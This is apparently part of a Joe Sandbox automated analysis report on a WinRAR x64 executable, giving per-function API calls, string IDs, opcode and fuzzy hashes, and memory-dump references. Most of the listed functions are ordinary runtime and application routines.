                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                            • String ID: CONOUT$
                                                            • API String ID: 3230265001-3130406586
                                                            • Opcode ID: 99401a05b28a9207d8dd0d05491b38b25e137ad6b948d1adcf7db3e2e0ec208d
                                                            • Instruction ID: edfda1f2bdb0034c0b17817ad51b5179e9b15d8b9afcbd6dfbce5bea2314c40c
                                                            • Opcode Fuzzy Hash: 99401a05b28a9207d8dd0d05491b38b25e137ad6b948d1adcf7db3e2e0ec208d
                                                            • Instruction Fuzzy Hash: 2611B921B18B4186E3508F46F856725A7A0FBAAFE5F004234DADDD7798CF3CD5048784
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(?,?,?,00007FF6C3BB876F,?,?,?,00007FF6C3BB8B2A), ref: 00007FF6C3BB8827
                                                            • GetProcAddress.KERNEL32(?,?,?,00007FF6C3BB876F,?,?,?,00007FF6C3BB8B2A), ref: 00007FF6C3BB8844
                                                            • GetProcAddress.KERNEL32(?,?,?,00007FF6C3BB876F,?,?,?,00007FF6C3BB8B2A), ref: 00007FF6C3BB8860
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$HandleModule
                                                            • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                            • API String ID: 667068680-1718035505
                                                            • Opcode ID: 7c169681784771b86197f8841d22ea9abd0677e23566ea11e573b1539fb58786
                                                            • Instruction ID: 23a969b2361a3d787995d5595a5b06a9c79df5ae8fb73ab012ea4790cdfd745f
                                                            • Opcode Fuzzy Hash: 7c169681784771b86197f8841d22ea9abd0677e23566ea11e573b1539fb58786
                                                            • Instruction Fuzzy Hash: EF115E20E0DB4382FE518F05BD82A7463916F36B8BF495434C9DDEA354EE3CE4458340
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: Time$File$System$Local$SpecificVersion
                                                            • String ID:
                                                            • API String ID: 2092733347-0
                                                            • Opcode ID: 785aab82d1612a79ecf9afd1edb4d9ea8d5d9007b697cc82a07f5d23ef14f703
                                                            • Instruction ID: e326287b271b650c778dc2aa4228ce51e72207aeb20d4487310613e27b934200
                                                            • Opcode Fuzzy Hash: 785aab82d1612a79ecf9afd1edb4d9ea8d5d9007b697cc82a07f5d23ef14f703
                                                            • Instruction Fuzzy Hash: A1418072F146118AEB04CFB5D4529AC37B1FB18789B504036DE9EA7B58DF38D545C740
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: Time$File$System$Local$SpecificVersion
                                                            • String ID:
                                                            • API String ID: 2092733347-0
                                                            • Opcode ID: 956c3446ac1bfcf25464c98837fee348a5ffcf07c062ffee1da10e396255a6cd
                                                            • Instruction ID: dcab8f76408c5ffad321f1717257d98881b707e16b67fd3ab7d5d35706f6103f
                                                            • Opcode Fuzzy Hash: 956c3446ac1bfcf25464c98837fee348a5ffcf07c062ffee1da10e396255a6cd
                                                            • Instruction Fuzzy Hash: DF316B62F10A518AFB04CFB5E8815BC7370FF1974AB14503AEE9EA7A58EE38D485C340
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                            • String ID: csm$csm$csm
                                                            • API String ID: 3523768491-393685449
                                                            • Opcode ID: b98dd5fb206b68b5eba08c546ad7e1a3d217a408265e6cb26d307de22595c447
                                                            • Instruction ID: ef7dd5e525a3bb9123a08327742712d877714cac82387b4a5db79ba822bf429c
                                                            • Opcode Fuzzy Hash: b98dd5fb206b68b5eba08c546ad7e1a3d217a408265e6cb26d307de22595c447
                                                            • Instruction Fuzzy Hash: B7E1A0729086828AE760DF25D4C2BAD77A0FB6675DF140139DACDAB696CF3CE481C740
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: ClearFreeStringVariant
                                                            • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL
                                                            • API String ID: 1438600931-566834514
                                                            • Opcode ID: f3f7c93dd0b59fb0b52d163d98fb192c0b00dec4ab2310369f2350d2941d171a
                                                            • Instruction ID: 2a4d7ce7aa3c9513754593f6a25f76a77dcbb043685fbb36daa213c188c20f8e
                                                            • Opcode Fuzzy Hash: f3f7c93dd0b59fb0b52d163d98fb192c0b00dec4ab2310369f2350d2941d171a
                                                            • Instruction Fuzzy Hash: 03714B36615F4685EB10DF25E8819AD73A4FB99B8AB404136EECE97B68CF3CE544C700
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                            • String ID: csm$f
                                                            • API String ID: 2395640692-629598281
                                                            • Opcode ID: a6761e8e7c818eeef342585bf932cfb9eaa669016519b3295bdcd8878ab48e67
                                                            • Instruction ID: a2c91b9e98a48cfc79b345020cb3bafbc82a2a437af95f2274b74f855bc599e5
                                                            • Opcode Fuzzy Hash: a6761e8e7c818eeef342585bf932cfb9eaa669016519b3295bdcd8878ab48e67
                                                            • Instruction Fuzzy Hash: A151D432A096028AD714EF15D486E293799FB66B8EF119130DADFAB748DF78F8418740
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RENAMEDLG$REPLACEFILEDLG
                                                            • API String ID: 0-56093855
                                                            • Opcode ID: 7d2f55ecc67719a671fa2d38e6172bed85f8f4a9c20d5812f76a5836ffd50a38
                                                            • Instruction ID: bc860d8e8de36a7b3fbd08c8919660f2bd9203eed0eb7faf279f54ba921f89a7
                                                            • Opcode Fuzzy Hash: 7d2f55ecc67719a671fa2d38e6172bed85f8f4a9c20d5812f76a5836ffd50a38
                                                            • Instruction Fuzzy Hash: 6A210724A0CB4780FA119F58B8869B433A0BF6B78AF400476D9DDEB2A0DF3CE1488740
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                            • String ID: CorExitProcess$mscoree.dll
                                                            • API String ID: 4061214504-1276376045
                                                            • Opcode ID: 05444a6bf7ffa3f7416842ed1fa788128f460aa067e84106622d22c8437a5a69
                                                            • Instruction ID: f7c578738b6d9ed9c0659e19b1899304e24437436c87e48f307a7ce79096ff1f
                                                            • Opcode Fuzzy Hash: 05444a6bf7ffa3f7416842ed1fa788128f460aa067e84106622d22c8437a5a69
                                                            • Instruction Fuzzy Hash: ACF0AF31B19A0781EA209F21F446B399720AFAA763F400236C6EED62E8CF3CD044C300
                                                            APIs
                                                              • Part of subcall function 00007FF6C3BAAD40: GetSystemDirectoryW.KERNEL32 ref: 00007FF6C3BAAD8F
                                                              • Part of subcall function 00007FF6C3BAAD40: LoadLibraryW.KERNEL32 ref: 00007FF6C3BAADF9
                                                            • GetProcAddress.KERNEL32(?,?,00000000,00007FF6C3BA88A4), ref: 00007FF6C3BA8615
                                                            • GetProcAddress.KERNEL32(?,?,00000000,00007FF6C3BA88A4), ref: 00007FF6C3BA8629
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                            • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                            • API String ID: 2141747552-1753850145
                                                            • Opcode ID: 4ce61287271f290ba2b07551fa6b18b95ce5e80074612e3ef42cdca0632c0f33
                                                            • Instruction ID: 36ab894c548681811eff7c4afa85148e1aba315681036307eb8cfcd989017cb1
                                                            • Opcode Fuzzy Hash: 4ce61287271f290ba2b07551fa6b18b95ce5e80074612e3ef42cdca0632c0f33
                                                            • Instruction Fuzzy Hash: 38F05865E0AF4681EF018F25E4566642BA0AF3AB4AF484038C9CC96358EF3CD495C340
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: AdjustPointer
                                                            • String ID:
                                                            • API String ID: 1740715915-0
                                                            • Opcode ID: 36d29e437cc54fc0d0163762a6bd59ee58dd3f3e7b9fd35c41fe11139d6dc90f
                                                            • Instruction ID: 3a71a46af2df8ffb66ba342fc334ccce9154302b1de0eabea933a4a911eb4722
                                                            • Opcode Fuzzy Hash: 36d29e437cc54fc0d0163762a6bd59ee58dd3f3e7b9fd35c41fe11139d6dc90f
                                                            • Instruction Fuzzy Hash: 44B1B621A0DA4A81EA65EF1590C2D396798AF76F8AF094435DECDAF785DF3CF4418380
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: _set_statfp
                                                            • String ID:
                                                            • API String ID: 1156100317-0
                                                            • Opcode ID: d1d10107198c09c3932fa6673c1dcca8ef673135442fdb47985b5f68ba886dfb
                                                            • Instruction ID: 8d37520468f5b6a67a6939b19141191c2a361da1534dce9a7c51be82b46bfba8
                                                            • Opcode Fuzzy Hash: d1d10107198c09c3932fa6673c1dcca8ef673135442fdb47985b5f68ba886dfb
                                                            • Instruction Fuzzy Hash: EC11C166E5CA8301F6D46D66F553B750041EF7B372F084634EAEEB62DECE3DA8814280
                                                            APIs
                                                            • FlsGetValue.KERNEL32(?,?,?,00007FF6C3BBFE57,?,?,00000000,00007FF6C3BC00F2,?,?,?,?,?,00007FF6C3BC007E), ref: 00007FF6C3BC753F
                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6C3BBFE57,?,?,00000000,00007FF6C3BC00F2,?,?,?,?,?,00007FF6C3BC007E), ref: 00007FF6C3BC755E
                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6C3BBFE57,?,?,00000000,00007FF6C3BC00F2,?,?,?,?,?,00007FF6C3BC007E), ref: 00007FF6C3BC7586
                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6C3BBFE57,?,?,00000000,00007FF6C3BC00F2,?,?,?,?,?,00007FF6C3BC007E), ref: 00007FF6C3BC7597
                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6C3BBFE57,?,?,00000000,00007FF6C3BC00F2,?,?,?,?,?,00007FF6C3BC007E), ref: 00007FF6C3BC75A8
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: Value
                                                            • String ID:
                                                            • API String ID: 3702945584-0
                                                            • Opcode ID: a18d1bb93033013d9260a128d3fe553969ba745fda5c1094212dda3b1d87667a
                                                            • Instruction ID: 01aacf3b026e9aedc096c0310ad81cdd70e835d6d00772053dabe98c8b773352
                                                            • Opcode Fuzzy Hash: a18d1bb93033013d9260a128d3fe553969ba745fda5c1094212dda3b1d87667a
                                                            • Instruction Fuzzy Hash: 28117C20F0824206FA68BF25758397D21819FAA3B2F044375E9FEE66C7DF2CE4028300
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: Value
                                                            • String ID:
                                                            • API String ID: 3702945584-0
                                                            • Opcode ID: 1c047d3acce2abe29490f83120ed055b61bd113f0c5f277fa6cfc2aa5ad0cb0e
                                                            • Instruction ID: afa90bdfbc4608c64c6e75267e175a01641468f9627199a3f5af8b6102a181d6
                                                            • Opcode Fuzzy Hash: 1c047d3acce2abe29490f83120ed055b61bd113f0c5f277fa6cfc2aa5ad0cb0e
                                                            • Instruction Fuzzy Hash: 0F111C20B082074AF978BF356453DBD11464FA3373E540775E9FEE62D2EE6CB5028250
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: Message$DispatchObjectPeekSingleTranslateWait
                                                            • String ID:
                                                            • API String ID: 3621893840-0
                                                            • Opcode ID: 3637ec5db6395a8c7f011773e1601cf3b2895b5d77d5ad8040c93efe90d32565
                                                            • Instruction ID: 7cd742ec7cfc5b732def2fcb6b2251ed00439dee62aef7a9a2546e460d65d239
                                                            • Opcode Fuzzy Hash: 3637ec5db6395a8c7f011773e1601cf3b2895b5d77d5ad8040c93efe90d32565
                                                            • Instruction Fuzzy Hash: BFF04F29F2844682F7649F24E496E766311EFBAB06F446030E5CE958549E2CD149CB00
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: DXGIDebug.dll
                                                            • API String ID: 3215553584-540382549
                                                            • Opcode ID: 26a2edb9a9702b89a9dfd7e93f4289afa163ffe19e6ccab0517458891712df38
                                                            • Instruction ID: d0a195cf447803aed82bddfa18737cd3e7c21fbefeb8a5d1f4b61158b251767b
                                                            • Opcode Fuzzy Hash: 26a2edb9a9702b89a9dfd7e93f4289afa163ffe19e6ccab0517458891712df38
                                                            • Instruction Fuzzy Hash: CD91D432A0864645F730AE26E652BBD3B95AB62B56F844137DADEE33D5DF3CE4018300
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: CallEncodePointerTranslator
                                                            • String ID: MOC$RCC
                                                            • API String ID: 3544855599-2084237596
                                                            • Opcode ID: 42aad5a187749a9eddd8fae2b3099538122f4e9ac69f397c69f5826ff634bc4b
                                                            • Instruction ID: bf0dad5107a326d27a150690f5f3aa38236498a276710cf61c27d46b8f668553
                                                            • Opcode Fuzzy Hash: 42aad5a187749a9eddd8fae2b3099538122f4e9ac69f397c69f5826ff634bc4b
                                                            • Instruction Fuzzy Hash: 6791BE73A08B818AE710CF65E4916AC7BA0FB56789F14413AEACDAB754DF3CD195CB00
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: CallEncodePointerTranslator
                                                            • String ID: MOC$RCC
                                                            • API String ID: 3544855599-2084237596
                                                            • Opcode ID: 58744c8bb07ed3aa3e58da5834242c9036a61f7ed2d139103f42bb17746798fd
                                                            • Instruction ID: e1040eb625a0bb87d7738cacff27d14e85c4b353fc664fbb4ed6668aa6e15e20
                                                            • Opcode Fuzzy Hash: 58744c8bb07ed3aa3e58da5834242c9036a61f7ed2d139103f42bb17746798fd
                                                            • Instruction Fuzzy Hash: 5A615B36A08A858AE720CF65D0817AD77A0F755B8DF044229EECD6BB99CF7CE195C700
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
